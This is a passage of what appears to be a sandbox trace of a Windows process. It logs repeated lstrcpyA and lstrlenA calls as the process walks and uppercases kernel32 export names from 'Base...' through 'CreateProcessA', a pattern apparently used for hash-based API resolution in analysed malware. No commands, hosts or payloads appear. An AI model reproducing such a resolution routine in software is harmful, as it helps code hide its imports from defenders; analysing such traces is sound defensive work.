returned="BaseIsAppcompatInfrastructureDisabled" [0087.726] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.726] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.726] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.726] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.726] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.726] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.726] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.726] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.726] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.726] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.726] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.726] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.726] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.726] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.726] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.726] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.726] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.726] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.726] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.726] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.726] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.726] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.726] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.726] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.726] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.726] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.726] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.726] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.726] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.726] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.726] lstrlenA (lpString="BEEP") returned 4 [0087.726] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.726] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.726] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.726] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.727] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.727] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.727] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.727] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.727] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.727] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.727] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.727] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.727] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.727] lstrlenA (lpString="CANCELIO") returned 8 [0087.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.727] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.727] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.727] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.727] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.727] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.727] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.727] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.727] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.727] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.728] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.728] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.728] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.728] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.728] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.728] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.728] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.728] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.728] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.728] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.728] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.728] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.728] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.728] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.728] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.728] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.728] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.728] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.728] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.728] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.729] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.729] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.729] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.729] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.729] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.729] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.729] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.729] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.729] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.729] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.729] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.729] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.729] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.729] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.729] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.729] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.729] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.729] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.730] lstrlenA (lpString="COPYFILEA") returned 9 [0087.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.730] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.730] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.730] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.730] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.730] lstrlenA (lpString="COPYFILEW") returned 9 [0087.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.730] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.730] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.730] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.730] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.730] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.730] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.730] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.730] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.730] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.730] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.730] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.730] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.731] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.731] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.738] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.739] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.739] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.739] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.739] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.739] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.739] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.739] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.739] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.739] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.739] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.739] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.739] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.739] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.739] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.739] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.739] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.739] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.739] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.740] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.740] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.740] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.740] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.740] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.740] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.740] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.740] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.740] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.740] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.740] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.740] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.740] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.740] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.740] lstrcpyA (in: lpString1=0x3f2d1ec, 